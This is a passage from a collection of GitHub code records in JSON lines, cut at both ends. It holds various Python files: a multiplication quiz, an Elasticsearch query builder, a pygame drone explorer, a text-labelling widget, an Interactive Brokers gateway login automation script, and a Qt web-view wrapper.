pitanja\r\n n_odgovori = [] # Lista za pohranu netočnih odgovora\r\n\r\n # Generiranje nasumičnih pitanja\r\n while len(pitanja) < broj_pitanja:\r\n X = random.choice(tablica)\r\n Y = random.choice(tablica)\r\n pitanje = f\"{X} * {Y} = \"\r\n if (pitanje, X * Y) not in pitanja:\r\n pitanja.append((pitanje, X * Y))\r\n\r\n # Provjera znanja\r\n while n_odgovori or pitanja:\r\n if not pitanja:\r\n pitanja = n_odgovori.copy()\r\n n_odgovori = []\r\n print(\"**************************************\")\r\n print(\"Ispitivanje za brojeve koje nisi znao:\")\r\n\r\n pitanje, odgovor = pitanja.pop(0)\r\n korisnikov_odgovor = input(pitanje)\r\n if int(korisnikov_odgovor) != odgovor:\r\n n_odgovori.append((pitanje, odgovor))\r\n\r\n print(\"****************\")\r\n print(\"***BRAVOOOO*****\")\r\n print(\"****************\")\r\n # kao nagradu otvara stranicu sa matematičkim igricama ili neki drugi link\r\n webbrowser.open('https://mathgames.com')\r\nprovjeri_tablicu()\r\n","repo_name":"DinoIsanovic/tablica-mnozenja","sub_path":"tablica.py","file_name":"tablica.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4225482191","text":"# https://leetcode.com/submissions/detail/718457400/\r\n# Date of Submission: 2022-06-09\r\n\r\n# Runtime: 38 ms, faster than 76.09% of Python3 online submissions for Reverse Integer.\r\n# Memory Usage: 13.8 MB, less than 96.91% of Python3 online submissions for Reverse Integer.\r\n\r\nclass Solution:\r\n def reverse(self, x: int) -> int:\r\n \r\n reversed = \"\"\r\n signFlag = 0\r\n x = str(x)\r\n if (x[0] == \"-\"):\r\n signFlag = 1\r\n x = x[1:]\r\n #check overflow cases\r\n if (len(x) == 10):\r\n firstDigit = int(x[-1])\r\n temp = x[-2::-1]\r\n if(firstDigit > 1 and int(temp) > 147483647 and signFlag == 0):\r\n return 0\r\n elif(firstDigit > 1 and int(temp) > 147483648 and signFlag == 1):\r\n return 0\r\n #normal case \r\n reversed = x[::-1]\r\n if(signFlag):\r\n reversed = \"-\" + reversed\r\n return int(reversed)","repo_name":"Retroflux/playground","sub_path":"LeetCodeSolutions/Python/0007-Reverse_Integer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32024219355","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='atomsk',\n version='0.0.4',\n author='Théo Bequet',\n author_email='theo.bequet@etu.univ-poitiers.fr',\n description='Toolbox for atomistic simulation',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/theobqt/python_toolbox',\n project_urls = {\n \"Bug Tracker\": \"https://github.com/theobqt/python_toolbox/issues\"\n },\n license='',\n packages=['atomsk'],\n install_requires=['requests'],\n)","repo_name":"theobqt/python_toolbox","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23915765798","text":"import abc\nimport re\nfrom datetime import date\nfrom enum import Enum, unique\nfrom typing import Dict, List, Union\n\nimport elasticsearch\n\n\nclass SearchEngineInterface(abc.ABC):\n \"\"\"\n Interface to abstract the interaction with the index system\n \"\"\"\n\n @abc.abstractmethod\n def search(self, query: Dict, index: str = \"\", timeout: int = 30) -> Dict:\n \"\"\"\n Searches the index with the provided elasticsearch_dsl.Search\n \"\"\"\n\n @abc.abstractmethod\n def index_exists(self, index: str) -> bool:\n \"\"\"\n Checks if a specific index exists\n \"\"\"\n\n\nclass ElasticSearch(SearchEngineInterface):\n def __init__(self, host: str, default_index: str = \"\"):\n self._es = elasticsearch.Elasticsearch(hosts=[host])\n self._default_index = default_index\n\n def search(self, query: Dict, index: str = \"\", timeout: int = 30) -> Dict:\n index_name = self._get_index_name(index)\n response = self._es.search(\n index=index_name, body=query, request_timeout=timeout\n )\n return response\n\n def index_exists(self, index: str) -> bool:\n return self._es.indices.exists(index=index)\n\n def _get_index_name(self, index: str) -> str:\n index_name = index if self._is_valid_index_name(index) else self._default_index\n if not self.index_exists(index_name):\n raise Exception(f'Index \"{index_name}\" does not exist')\n return index_name\n\n def _is_valid_index_name(self, index: str) -> bool:\n return isinstance(index, str) and len(index) > 0\n\n\nclass QueryBuilderInterface(abc.ABC):\n @abc.abstractmethod\n def build_query(self, **kwargs) -> Dict:\n \"\"\"\n Method to build queries using functionalities provided by the adequate mixins\n \"\"\"\n\n\nclass BoolQueryMixin:\n def build_bool_query(\n self,\n must: List[Dict] = [],\n should: List[Dict] = [],\n filter: List[Dict] = [],\n must_not: List[Dict] = [],\n ) -> Union[Dict, None]:\n if must == should == filter == must_not == []:\n return\n\n return {\n \"bool\": {\n \"must\": must,\n \"should\": should,\n \"filter\": filter,\n \"must_not\": must_not,\n }\n }\n\n\nclass MatchNoneQueryMixin:\n def build_match_none_query(self) -> Dict:\n return {\"match_none\": {}}\n\n\nclass MatchAllQueryMixin:\n def build_match_all_query(self) -> Dict:\n return {\"match_all\": {}}\n\n\nclass DateRangeQueryMixin:\n def build_date_range_query(\n self,\n field: str,\n since: Union[date, None] = None,\n until: Union[date, None] = None,\n ) -> Union[Dict, None]:\n if since is None and until is None:\n return\n\n date_range_query = {field: {}}\n if since is not None:\n date_range_query[field][\"gte\"] = since.isoformat()\n if until is not None:\n date_range_query[field][\"lte\"] = until.isoformat()\n\n return {\"range\": date_range_query}\n\n\nclass TermsQueryMixin:\n def build_terms_query(self, field: str, terms: List[str] = []) -> Union[Dict, None]:\n if terms != []:\n return {\"terms\": {field: terms}}\n\n\nclass SimpleStringQueryMixin:\n def build_simple_query_string_query(\n self, querystring: str, fields: List[str] = [], exact_field_suffix: str = \"\"\n ) -> Union[Dict, None]:\n if querystring == \"\":\n return\n\n clean_querystring = self._preprocess_querystring(querystring)\n return {\n \"simple_query_string\": {\n \"query\": clean_querystring,\n \"fields\": fields,\n \"quote_field_suffix\": exact_field_suffix,\n }\n }\n\n def _preprocess_querystring(self, querystring: str) -> str:\n return self._translate_curly_text_to_straight(querystring)\n\n def _translate_curly_text_to_straight(self, text: str) -> str:\n translated_double = re.sub(r\"[“”]\", r'\"', text)\n translated_single = re.sub(r\"[‘’]\", r\"'\", translated_double)\n return translated_single\n\n\nclass RankFeatureQueryMixin:\n def build_rank_feature_query(self, field: str):\n return {\"rank_feature\": {\"field\": field}}\n\n\n@unique\nclass FieldSortOrder(str, Enum):\n DESCENDING = \"desc\"\n ASCENDING = \"asc\"\n\n\nclass SortMixin:\n def add_sorts(self, query: Dict, sorts: List[Dict] = []) -> None:\n if sorts != []:\n query[\"sort\"] = sorts\n\n def build_sort(self, field: str, order: FieldSortOrder) -> Dict:\n return {field: {\"order\": order.value}}\n\n\nclass PaginationMixin:\n def add_pagination_fields(\n self,\n query: Dict,\n offset: Union[int, None] = None,\n size: Union[int, None] = None,\n ) -> None:\n if offset is not None:\n query[\"from\"] = offset\n\n if size is not None:\n query[\"size\"] = size\n\n\nclass HighlightMixin:\n def add_highlight(self, query: Dict, fields_highlights: List[Dict] = [],) -> None:\n if fields_highlights == []:\n return\n\n highlight = {\"highlight\": {\"fields\": {}}}\n for field_highlight in fields_highlights:\n highlight[\"highlight\"][\"fields\"].update(field_highlight)\n\n query.update(highlight)\n\n def build_field_highlight(\n self,\n field: str,\n fragment_size: Union[int, None] = None,\n number_of_fragments: Union[int, None] = None,\n pre_tags: List[str] = [],\n post_tags: List[str] = [],\n type: str = \"unified\",\n matched_fields: List[str] = [],\n ) -> Dict:\n field_highlight = {\n \"pre_tags\": pre_tags,\n \"post_tags\": post_tags,\n \"type\": type,\n }\n\n if fragment_size is not None:\n field_highlight[\"fragment_size\"] = fragment_size\n\n if number_of_fragments is not None:\n field_highlight[\"number_of_fragments\"] = number_of_fragments\n\n if type == \"fvh\" and matched_fields:\n field_highlight[\"matched_fields\"] = matched_fields\n\n return {field: field_highlight}\n\n\ndef create_search_engine_interface(\n host: str = \"\", default_index: str = \"\"\n) -> SearchEngineInterface:\n if not isinstance(host, str) or len(host.strip()) == 0:\n raise Exception(\"Missing host\")\n if not isinstance(default_index, str):\n raise Exception(\"Invalid index name\")\n return ElasticSearch(host.strip(), default_index=default_index.strip())\n","repo_name":"okfn-brasil/querido-diario-api","sub_path":"index/elasticsearch.py","file_name":"elasticsearch.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"32"} +{"seq_id":"42183695683","text":"import pygame\nfrom Domain.constants import *\nfrom controller import *\nfrom random import randint\nimport time\n\nclass GUI:\n\n def __init__(self):\n # We position on a random area on the map the drone\n # x = randint(START, END)\n x = 2\n y = 4\n # y = randint(START, END)\n self.__controller = Controller(x, y)\n\n\n def initializeMainScreen(self):\n screen = pygame.display.set_mode(MAIN_WINDOW)\n screen.fill(WHITE)\n\n screen.blit(self.__controller.getEnvironment().image(), FULL_BLIT)\n pygame.display.flip()\n return screen\n\n\n def initializeStartScreen(self):\n screen = pygame.display.set_mode(START_WINDOW)\n screen.fill(WHITE)\n\n # add background image\n background = pygame.image.load(\"nyanstart2.png\")\n screen.blit(background, FULL_BLIT)\n\n # add font\n pygame.font.init()\n font = pygame.font.SysFont('comicsans', START_FONT)\n image = font.render('Explore the galaxy!', True, NAVYBLUE)\n\n # draw the button\n pygame.draw.rect(screen, WHITE, POSITION_BUTTON, border_radius = BORDER)\n pygame.draw.rect(screen, BLACK, POSITION_BUTTON, 2, border_radius= BORDER)\n screen.blit(image, BLIT_START_FONT)\n pygame.display.flip()\n return screen\n\n\n def initializeGame(self):\n\n # initialize the pygame module\n pygame.init()\n\n # load and set the logo\n logo = pygame.image.load(\"nyanlogo.png\")\n pygame.display.set_icon(logo)\n pygame.display.set_caption(\"Interstellar travel\")\n\n # add music\n pygame.mixer.init()\n pygame.mixer.music.load(\"nyan.mp3\")\n pygame.mixer.music.play(MUSIC_REPEAT, MUSIC_REPEAT)\n\n\n def start(self):\n\n self.initializeGame()\n screen = self.initializeStartScreen()\n\n start = True\n runningMain = False\n\n # start screen\n while start:\n # event handling, gets all event from the event queue\n for event in pygame.event.get():\n # only do something if the event is of type QUIT\n if event.type == pygame.QUIT:\n # change the value to False, to exit the main loop\n start = False\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if START_BUTTON <= pygame.mouse.get_pos()[MOUSE_WIDTH_POS] <= END_BUTTON_WIDTH:\n if START_BUTTON <= pygame.mouse.get_pos()[MOUSE_HEIGHT_POS] <= END_BUTTON_HEIGHT:\n # Exist the current loop and enter the MAIN WINDOW\n screen = self.initializeMainScreen()\n runningMain = True\n start = False\n\n\n # main screen\n while runningMain:\n # event handling, gets all event from the event queue\n for event in pygame.event.get():\n # only do something if the event is of type QUIT\n if event.type == pygame.QUIT:\n # change the value to False, to exit the main loop\n runningMain = False\n\n # We move the spaceship one step using DFS\n self.__controller.moveDSF()\n time.sleep(SLEEP)\n\n if self.__controller.getDroneX() is None and self.__controller.getDroneY() is None:\n runningMain = False\n else:\n self.__controller.markDetectedWalls()\n screen.blit(self.__controller.getDMapImage(), DMAP_BLIT)\n pygame.display.flip()\n\n pygame.quit()\n\n","repo_name":"AlexandraBledea/Sem4-AI","sub_path":"Assignments/Lab1/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33849126021","text":"#We can Import previously created functions or modules for use by using the following commands:\r\n#Note that they need to be on the same level as the ones where we are trying to import them.\r\n#Some examples are the following:\r\nfrom py_day_test import some_rando, make_messages\r\n\r\nfrom py_day_mod.make_messages import MessageUser\r\n\r\nfrom random.whatever import anything\r\n\r\n#Then we can continue adding values.\r\n#An example is after loading the previous exercise from 9 Converting Function to Class we can continue to import users:\r\nobj = MessageUser()\r\nobj.add_user(\"Abc\", 123.32, email='hello@teamcfe.com')\r\nobj.add_user(\"jOhn\", 94.23)\r\nobj.add_user(\"Sean\", 93.23)\r\nobj.add_user(\"Emilee\", 193.23)\r\nobj.add_user(\"Marie\", 13.23)\r\nobj.get_details()\r\n\r\nprint(obj.make_messages())\r\n\r\n","repo_name":"Kokkalo4/Python-Learning-Project","sub_path":"10 Importing to Python.py","file_name":"10 Importing to Python.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16153848813","text":"from __future__ import division\nfrom itertools import chain\nfrom collections import OrderedDict, Iterator, defaultdict\n\nimport numpy as np\n\n__all__ = ['round_any', 'min_max', 'match',\n 'precision', 'first_element', 'multitype_sort',\n 'is_close_to_int', 'same_log10_order_of_magnitude',\n 'identity'\n ]\n\nDISCRETE_KINDS = 'ObUS'\nCONTINUOUS_KINDS = 'ifuc'\n\nSECONDS = OrderedDict([\n ('ns', 1e-9), # nanosecond\n ('us', 1e-6), # microsecond\n ('ms', 1e-3), # millisecond\n ('s', 1), # second\n ('m', 60), # month\n ('h', 3600), # hour\n ('d', 24*3600), # day\n ('w', 7*24*3600), # week\n ('M', 31*24*3600), # month\n ('y', 365*24*3600), # year\n])\n\nNANOSECONDS = OrderedDict([\n ('ns', 1), # nanosecond\n ('us', 1e3), # microsecond\n ('ms', 1e6), # millisecond\n ('s', 1e9), # second\n ('m', 60e9), # month\n ('h', 3600e9), # hour\n ('d', 24*3600e9), # day\n ('w', 7*24*3600e9), # week\n ('M', 31*24*3600e9), # month\n ('y', 365*24*3600e9), # year\n])\n\n\ndef round_any(x, accuracy, f=np.round):\n \"\"\"\n Round to multiple of any number.\n \"\"\"\n x = np.asarray(x)\n return f(x / accuracy) * accuracy\n\n\ndef min_max(x, nan_rm=False, finite=True):\n \"\"\"\n Return the minimum and maximum of x\n\n Parameters\n ----------\n x : array_like\n Sequence\n nan_rm : bool\n Whether to remove ``nan`` values.\n finite : bool\n Whether to consider only finite values.\n\n Returns\n -------\n out : tuple\n (minimum, maximum) of x\n \"\"\"\n x = np.asarray(x)\n if nan_rm and finite:\n x = x[np.isfinite(x)]\n elif nan_rm:\n x = x[~np.isnan(x)]\n elif finite:\n x = x[~np.isinf(x)]\n\n if (len(x)):\n return np.min(x), np.max(x)\n else:\n return float('-inf'), float('inf')\n\n\ndef match(v1, v2, nomatch=-1, incomparables=None, start=0):\n \"\"\"\n Return a vector of the positions of (first)\n matches of its first argument in its second.\n\n Parameters\n ----------\n v1: array_like\n Values to be matched\n\n v2: array_like\n Values to be matched against\n\n nomatch: int\n Value to be returned in the case when\n no match is found.\n\n incomparables: array_like\n Values that cannot be matched. Any value in ``v1``\n matching a value in this list is assigned the nomatch\n value.\n start: int\n Type of indexing to use. Most likely 0 or 1\n \"\"\"\n v2_indices = {}\n for i, x in enumerate(v2):\n if x not in v2_indices:\n v2_indices[x] = i\n\n v1_to_v2_map = [nomatch] * len(v1)\n skip = set(incomparables) if incomparables else set()\n for i, x in enumerate(v1):\n if x in skip:\n continue\n\n try:\n v1_to_v2_map[i] = v2_indices[x] + start\n except KeyError:\n pass\n\n return v1_to_v2_map\n\n\ndef precision(x):\n \"\"\"\n Return the precision of x\n\n Parameters\n ----------\n x : array_like | numeric\n Value(s) whose for which to compute the precision.\n\n Returns\n -------\n out : numeric\n The precision of ``x`` or that the values in ``x``.\n\n Notes\n -----\n The precision is computed in base 10.\n\n Examples\n --------\n >>> precision(0.08)\n 0.01\n >>> precision(9)\n 1\n >>> precision(16)\n 10\n \"\"\"\n from .bounds import zero_range\n\n rng = min_max(x, nan_rm=True)\n if zero_range(rng):\n span = np.abs(rng[0])\n else:\n span = np.diff(rng)[0]\n\n if span == 0:\n return 1\n else:\n return 10 ** int(np.floor(np.log10(span)))\n\n\ndef first_element(obj):\n \"\"\"\n Return the first element of `obj`\n\n Parameters\n ----------\n obj : iterable\n Should not be an iterator\n\n Returns\n -------\n out : object\n First element of `obj`. Raise a class:`StopIteration`\n exception if `obj` is empty.\n \"\"\"\n if isinstance(obj, Iterator):\n raise RuntimeError(\n \"Cannot get the first element of an iterator\")\n return next(iter(obj))\n\n\ndef multitype_sort(a):\n \"\"\"\n Sort elements of multiple types\n\n x is assumed to contain elements of different types, such that\n plain sort would raise a `TypeError`.\n\n Parameters\n ----------\n a : array-like\n Array of items to be sorted\n\n Returns\n -------\n out : list\n Items sorted within their type groups.\n \"\"\"\n types = defaultdict(list)\n numbers = {int, float, complex}\n\n for x in a:\n t = type(x)\n if t in numbers:\n types['number'].append(x)\n else:\n types[t].append(x)\n\n for t in types:\n types[t] = np.sort(types[t])\n\n return list(chain(*(types[t] for t in types)))\n\n\ndef nearest_int(x):\n \"\"\"\n Return nearest long integer to x\n \"\"\"\n if x == 0:\n return np.int64(0)\n elif x > 0:\n return np.int64(x + 0.5)\n else:\n return np.int64(x - 0.5)\n\n\ndef is_close_to_int(x):\n \"\"\"\n Check if value is close to an integer\n\n Parameters\n ----------\n x : float\n Numeric value to check\n\n Returns\n -------\n out : bool\n \"\"\"\n if not np.isfinite(x):\n return False\n return abs(x - nearest_int(x)) < 1e-10\n\n\ndef same_log10_order_of_magnitude(rng, delta=0.045):\n \"\"\"\n Return true if range is approximately in same order of magnitude\n\n For example these sequences are in the same order of magnitude:\n\n - [log(1), log(8)] # [1, 10)\n - [log(35), log(80)] # [10 100)\n - [log(232), log(730)] # [100, 1000)\n\n Parameters\n ----------\n rng : array-like\n Range of values in log base 10. Must be size 2 and\n ``rng[0] <= rng[1]``.\n delta : float\n Fuzz factor for approximation. Since the ``rng`` is in\n log form, this factor is additional.\n \"\"\"\n rng_adjusted = np.array(rng) + [-delta, +delta]\n return np.diff(rng_adjusted.astype(int))[0] == 0\n\n\ndef identity(*args):\n \"\"\"\n Return whatever is passed in\n \"\"\"\n return args if len(args) > 1 else args[0]\n","repo_name":"AathmanT/flask-website","sub_path":"data/venv/Lib/site-packages/mizani/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"23211577600","text":"import subprocess, fcntl, os\nfrom time import sleep\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom time import time\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom src.logger import logger\nfrom src.utils.config_loader import creds_conf\n\nfrom src.utils.mfa_sms_receiver import MFASMSReceiver\n\nLOGIN_SUCCEEDS_PHRASE = \"Client login succeeds\"\nGATEWAY_RUNNING_PHRASE = \"Open https://localhost:5000 to login\"\nGATEWAY_RUN_PATH = \"bin/run.sh\"\nGATEWAY_CONF_ATH = \"root/conf.yaml\"\nGATEWAY_WORKDIR_PATH = \"external_bin/clientportal.beta.gw\"\nTIMEOUT_SECONDS = 10\n\n\ndef launch_ib_gateway_and_auth():\n _open_gateway_process()\n _automate_auth()\n\n\ndef relaunch():\n _kill_gateway_process()\n\n launch_ib_gateway_and_auth()\n\n\ndef _kill_gateway_process():\n kill_cmd = \"kill -9 $(netstat -ltnp 2>/dev/null | grep 0.0.0.0:5000 | awk '{print $7}' | cut -d \\\"/\\\" -f 1)\"\n\n proc = subprocess.run(kill_cmd, stdout=subprocess.PIPE)\n\n logger.info(f\"Run command output: {proc.stdout.readline()}\")\n\n\ndef _open_gateway_process():\n p = subprocess.Popen([GATEWAY_RUN_PATH, GATEWAY_CONF_ATH], cwd=GATEWAY_WORKDIR_PATH,\n stdout=subprocess.PIPE)\n\n # Reading stdout without blocking (https://stackoverflow.com/a/8980466/10249811)\n fcntl.fcntl(p.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)\n\n # Read stdout until gateway launch finish or timeout reached\n start = time()\n time_elapsed_sec = 0\n\n aggregated_output = b\"\"\n while GATEWAY_RUNNING_PHRASE not in str(aggregated_output) and time_elapsed_sec <= TIMEOUT_SECONDS:\n current_output = p.stdout.read()\n if current_output is not None:\n aggregated_output += current_output\n sleep(1)\n time_elapsed_sec = start - time()\n\n if GATEWAY_RUNNING_PHRASE not in str(aggregated_output):\n raise SystemError(f\"IB gateway failed to launch, output: {aggregated_output}\")\n\n return True\n\n\ndef _automate_auth():\n user_name, password, is_live = creds_conf[\"ib_user_name\"], creds_conf[\"ib_password\"], creds_conf[\n \"is_live_account\"]\n\n sms_receiver = MFASMSReceiver(60)\n if is_live:\n sms_receiver.start_listening_for_auth_code()\n\n driver = webdriver.PhantomJS(service_args=['--ignore-ssl-errors=true'],\n service_log_path=\"/tmp/phantom_logs.log\")\n driver.get(\"https://localhost:5000\")\n\n un_box = driver.find_element_by_id(\"user_name\")\n pw_box = driver.find_element_by_id(\"password\")\n submit_btn = driver.find_element_by_id(\"submitForm\")\n\n un_box.send_keys(user_name)\n pw_box.send_keys(password)\n submit_btn.click()\n\n if is_live:\n # IB uses MFA only for live accounts\n SECURITY_CODE_BOX_ID = \"chlginput\"\n try:\n WebDriverWait(driver, 5).until(\n EC.presence_of_element_located((By.ID, SECURITY_CODE_BOX_ID)))\n except TimeoutException:\n logger.error(\"IB auth failed: MFA security code element wasn't present\")\n driver.quit()\n raise\n\n auth_code = sms_receiver.auth_code\n if auth_code is not None:\n sec_code_box = driver.find_element_by_id(SECURITY_CODE_BOX_ID)\n sec_code_box.send_keys(auth_code)\n\n submit_btn = driver.find_element_by_id(\"submitForm\")\n submit_btn.click()\n else:\n raise SystemError(\"IB auth code for MFA was not received\")\n\n try:\n WebDriverWait(driver, 10).until(\n EC.text_to_be_present_in_element((By.CSS_SELECTOR, \"pre\"), LOGIN_SUCCEEDS_PHRASE))\n except TimeoutException:\n logger.error(f\"Login to IB failed, success page loading timed out, page source: {driver.page_source}\")\n raise\n finally:\n driver.quit()\n\n return True\n\n\nif __name__ == \"__main__\":\n launch_ib_gateway_and_auth()\n","repo_name":"matanbakshi/ib-portfolio-manager","sub_path":"src/utils/ib_gateway_launcher.py","file_name":"ib_gateway_launcher.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"31438611733","text":"import ipywidgets as widgets\nfrom IPython.display import display\nfrom ipywidgets import Button, HBox, VBox\nimport pandas as pd\nimport numpy as np\n\n\n__all__ = ['LabelMyTextWidget']\n\nclass LabelMyTextWidget:\n \"\"\" \n Widget to quickly label a dataframe containing a column with text data and a column with target labels.\n \n \"\"\"\n def __init__(self, df_source, content_column, class_list, class_id, output_column, unclassified_value=-1, randomize=False):\n \"\"\"\n Create a LabelMyTextWidget object.\n \n :param df_source: The pandas dataframe containing the data column and the label column (to fill by the widget)\n :param content_column: The name of the column containing the text data to label\n :param class_list: List of the label type names (ex: Positive, Negative, Neutral)\n :param class_id: The id of each label type\n :param output_column: Name of the column to complete with labels\n :param unclassified_value: Value of the unclassified rows for the output_column\n :param randomize: If true, the labeling order will be random. If False, it will follow the index numbers\n\n \n :Example:\n >>> df['text'] = 'example of text content to label'\n >>> df['label'] = -1\n >>> LabelMyText(df, 'text', ['positive', 'negative'], [1, 0], 'label', unclassified_value=-1)\n \"\"\"\n \n self.df_source = df_source\n self.content_column = content_column\n self.output_column = output_column\n self.unclassified_value = unclassified_value\n self.randomize = randomize\n \n \n self.items = [ButtonLabeling(class_id = class_id[i],description=l) for i, l in enumerate(class_list)]\n self.items.append(ButtonLabeling(class_id = unclassified_value, description='Skip', button_style='warning'))\n\n for button in self.items:\n button.on_click(self.on_button_clicked_t)\n\n\n\n self.out = widgets.Output(layout={'border': '1px solid black'})\n self.out.append_stderr('Text is coming here')\n\n button_box = HBox([widgets.Label(value=\"Label\"), *self.items])\n\n self.box = VBox([button_box, self.out]) \n \n self.df_explore = self.df_source[self.df_source[output_column] == unclassified_value].index\n self.cursor = 0\n \n if randomize:\n self.df_explore = np.random.permutation(self.df_explore)\n \n self.out.clear_output(wait=True)\n \n \n def display(self):\n \"\"\"\n Display the widget\n \"\"\"\n display(self.box)\n self.display_next_row()\n \n def on_button_clicked_t(self, b):\n #print(f\"TEST Button clicked: {b.description}, {b.class_id}\")\n if (self.cursor) <= len(self.df_explore) and len(self.df_explore) > 0: \n self.df_source.loc[self.df_explore[self.cursor - 1], self.output_column] = b.class_id\n self.display_next_row()\n \n def display_next_row(self):\n #pdb.set_trace()\n if (self.cursor) >= len(self.df_explore): \n with self.out:\n self.out.clear_output()\n print('Finished: All rows have been processed')\n return\n \n next_text = str(self.df_source[self.content_column].loc[self.df_explore[self.cursor]])\n with self.out:\n print(f'Row index: {self.df_explore[self.cursor]} | Number of rows processed : {self.cursor} \\n')\n print(f'{next_text}')\n \n \n self.cursor += 1\n self.out.clear_output(wait=True)\n \n \n \n \n\nclass ButtonLabeling(Button):\n def __init__(self, class_id, *args, **kwargs):\n self.class_id = class_id\n super().__init__(*args, **kwargs)\n ","repo_name":"tchambon/LabelMyTextWidget","sub_path":"LabelMyTextWidget/LabelMyTextWidget.py","file_name":"LabelMyTextWidget.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"32"} +{"seq_id":"22738204937","text":"from pyspark.sql import SparkSession\n\nspark = SparkSession \\\n .builder \\\n .appName(\"Python Spark SQL Hive integration for clean data\") \\\n .enableHiveSupport() \\\n .getOrCreate()\n\ndatabase = 'service_system_db'\ntable = 'exit_jour'\nlimit = ' limit 10'\nsql = \"select * from {database}.{table} where n_ex_date < \\\n 20180631 and n_ex_date >20180601 {limit}\".format(database=database, table=table, limit=limit)\n\n\nprint(sql)\ndf = spark.sql(sql).rdd.collect()\n\n\nspark.stop()\n\n","repo_name":"fountain111/gs_spark","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32596627224","text":"from __future__ import annotations\n\nfrom collections.abc import Callable\nimport webbrowser\n\nfrom prettyqt import core, webenginecore, widgets\nfrom prettyqt.qt import QtWebEngineWidgets\nfrom prettyqt.utils import datatypes\n\n\n# os.environ[\"QTWEBENGINE_CHROMIUM_FLAGS\"] = \"--enable-logging --log-level=3\"\n\n\nclass WebEngineView(widgets.WidgetMixin, QtWebEngineWidgets.QWebEngineView):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setPage(webenginecore.WebEnginePage(self))\n\n def set_url(self, url: datatypes.UrlType | datatypes.PathType):\n \"\"\"Set the url of the WebEngineView.\n\n Clears the view and loads the URL.\n\n Args:\n url: URL to set\n \"\"\"\n url = datatypes.to_url(url)\n self.setUrl(url)\n\n def get_url(self) -> core.Url:\n return core.Url(self.url())\n\n def load_url(self, url: datatypes.UrlType | datatypes.PathType):\n \"\"\"Load the URL.\n\n Loads the specified url and displays it.\n\n Note: The view remains the same until enough data has arrived\n to display the new URL.\n\n Args:\n url: URL to load\n \"\"\"\n url = datatypes.to_url(url)\n self.load(url)\n\n def set_zoom(self, zoom: float):\n \"\"\"Set the zoom factor for the view.\n\n Valid values are within the range from 0.25 to 5.0. The default factor is 1.0.\n\n Args:\n zoom: Zoom factor\n \"\"\"\n self.setZoomFactor(zoom)\n\n def find_text(\n self,\n string: str,\n backward: bool = False,\n case_sensitive: bool = False,\n callback: Callable[[bool], None] | None = None,\n ):\n \"\"\"Find text in the current page.\n\n Finds the specified string, subString, in the page, using the given options.\n The findTextFinished() signal is emitted when a string search is completed.\n\n To clear the search highlight, just pass an empty string.\n\n The resultCallback must take a boolean parameter.\n It will be called with a value of true if the subString was found;\n otherwise the callback value will be false.\n\n Warning: It is guaranteed that the callback is always called,\n but it might be done during page destruction. When WebEnginePage is deleted,\n the callback is triggered with an invalid value and it is not safe to use\n the corresponding QWebEnginePage or QWebEngineView instance inside it.\n\n Args:\n string: string to search for\n backward: search backwards\n case_sensitive: case-sensitive search\n callback: result callback\n \"\"\"\n if callback is None:\n\n def do_nothing(x):\n pass\n\n callback = do_nothing\n flag = webenginecore.WebEnginePage.FindFlag(0)\n if case_sensitive:\n flag |= webenginecore.WebEnginePage.FindFlag.FindCaseSensitively\n if backward:\n flag |= webenginecore.WebEnginePage.FindFlag.FindBackward\n self.findText(string, flag, callback)\n\n def get_settings(self) -> webenginecore.WebEngineSettings:\n settings = self.settings()\n return webenginecore.WebEngineSettings(settings)\n\n def set_setting(\n self,\n setting_name: webenginecore.webenginesettings.WebAttributeStr,\n value: bool,\n ):\n self.get_settings()[setting_name] = value\n\n def get_setting(\n self, setting_name: webenginecore.webenginesettings.WebAttributeStr\n ) -> bool:\n return self.get_settings()[setting_name]\n\n @classmethod\n def register_as_browser(cls, tabwidget: widgets.TabWidget):\n class BuiltInBrowser(webbrowser.BaseBrowser):\n def open(self, url: str, new: int = 0, autoraise: bool = True):\n # logger.info(f\"opening {url} with builtin browser..\")\n webview = cls()\n webview.load_url(url)\n if new == 1:\n webview.show()\n else:\n tabwidget.add_tab(webview, url, show=autoraise)\n\n webbrowser.register(\"BuiltInBrowser\", BuiltInBrowser)\n\n def last_context_menu_request(\n self,\n ) -> webenginecore.WebEngineContextMenuRequest | None:\n req = self.lastContextMenuRequest()\n return webenginecore.WebEngineContextMenuRequest(req) if req else None\n\n\nif __name__ == \"__main__\":\n import pathlib\n\n from prettyqt import widgets\n\n app = widgets.app()\n widget = WebEngineView()\n\n import markdown\n\n path = 